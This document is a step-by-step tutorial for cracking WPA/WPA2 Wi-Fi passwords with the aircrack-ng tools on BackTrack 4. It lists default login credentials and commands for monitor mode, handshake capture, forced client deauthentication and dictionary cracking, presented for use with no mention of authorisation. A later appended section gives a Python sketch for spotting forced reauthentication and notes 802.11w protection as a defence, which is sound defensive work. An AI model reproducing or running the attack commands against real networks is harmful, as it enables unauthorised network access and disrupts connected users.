How to hack WPA/WPA2

1. BackTrack 4 live CD/USB or installation;
2. Willing to read all this :)
The first you can download for free from here: http://www.backtrack-linux.org/downloads/.
Username to enter BackTrack: root
Password: toor
Type startx and hit the ENTER key to fire up the graphical interface of BT4.
We need 3 terminals open, so let's start:
1. airmon-ng stop wlan0 (This command stops the wifi adaptor)
2. airmon-ng start wlan0 (This command starts the wifi adaptor in monitoring mode)
3. airodump-ng wlan0 (This command is used only to pick a network for the test, by signal strength, channel, BSSID, ESSID. The command is stopped with CTRL+C; we are looking for a WPA or WPA2 network)
4. airodump-ng --channel (Channel number) --bssid (MAC address of the network) -w (File name where the captured information will be saved) wlan0 (Leave this running and open a new terminal)
Here it is a good idea to mention that there are two ways to get the key: one is to wait for a client/AP (access point) handshake, and two is to deauthenticate an already connected client and force him to reauthenticate, to get the handshake packet. OK, I will assume we were lucky and we got the authentication handshake packet; then in the top right part of the console we can see this: "WPA handshake: 00:14:6C:7E:40:80", where 00:14:6C:7E:40:80 is the MAC address of the access point.
So far so good, but what if we don't get any authentication handshake packet? Well, we can force our luck by deauthenticating an already connected client and making him reauthenticate so we can get our handshake packet:
5. aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0
where -0 is the deauthentication command, 1 is the number of deauthentications to be sent, -a is the MAC address of the AP, and -c is the MAC address of the client. It is important here to keep in mind the signal strength and the distance between you and the client!
6. aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 *.cap
Before running the aircrack-ng command we need to stop step 4 with Ctrl+C, and keep in mind that *.cap is the file name that we selected for the -w parameter in step 4.
-w password.lst is a small dictionary list that comes with aircrack-ng. This dictionary list is optional; you can use your own or download one from the internet.
Enjoy!
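
Seen from the access point owner's side, step 5 leaves a recognisable trace: a run of deauthentication frames for one client followed within seconds by a fresh handshake. The sketch below is an added example, not part of the original post; the event records, the Frame tuple, the second client MAC and the thresholds are constructed assumptions, while the AP and client MACs are the ones used in the post.

```python
from collections import namedtuple

# Constructed sample events, as a monitor-mode sensor or wireless IDS might
# log them: (seconds, frame kind, source MAC, destination MAC, BSSID).
Frame = namedtuple("Frame", "ts kind src dst bssid")

AP = "00:14:6C:7E:40:80"       # AP MAC used in the post
CLIENT = "00:0F:B5:FD:FB:C2"   # client MAC used in the post
OTHER = "00:11:22:33:44:55"    # constructed second client

SAMPLE = [
    Frame(10.0, "eapol", AP, OTHER, AP),     # normal join, no deauth before it
    Frame(42.1, "deauth", AP, CLIENT, AP),   # deauth addressed to the client
    Frame(42.2, "deauth", CLIENT, AP, AP),   # deauth addressed to the AP
    Frame(42.3, "deauth", AP, CLIENT, AP),
    Frame(44.0, "eapol", AP, CLIENT, AP),    # handshake right after the deauths
    Frame(300.0, "deauth", AP, OTHER, AP),   # lone deauth, client never rejoins
]

def forced_reauths(frames, window=10.0, min_deauths=2):
    """Return (client, bssid, deauth_count, handshake_ts) for every handshake
    that follows at least min_deauths deauth frames for the same client and
    BSSID within `window` seconds. Broadcast deauths are not handled here."""
    recent = {}   # (client, bssid) -> timestamps of deauth frames seen so far
    alerts = []
    for f in sorted(frames, key=lambda f: f.ts):
        # The client is whichever address is not the BSSID.
        client = f.dst if f.src == f.bssid else f.src
        key = (client, f.bssid)
        if f.kind == "deauth":
            recent.setdefault(key, []).append(f.ts)
        elif f.kind == "eapol":
            hits = [t for t in recent.pop(key, []) if f.ts - t <= window]
            if len(hits) >= min_deauths:
                alerts.append((client, f.bssid, len(hits), f.ts))
    return alerts

if __name__ == "__main__":
    for client, bssid, n, ts in forced_reauths(SAMPLE):
        print(f"t={ts}: {client} re-keyed with {bssid} after {n} deauth frames")
```

An alert like this means a handshake may have been captured, so the remaining defence is the passphrase itself: step 6 only succeeds if the passphrase is in the dictionary. Enabling 802.11w Protected Management Frames, where the AP and clients support it, lets clients reject forged deauthentication frames.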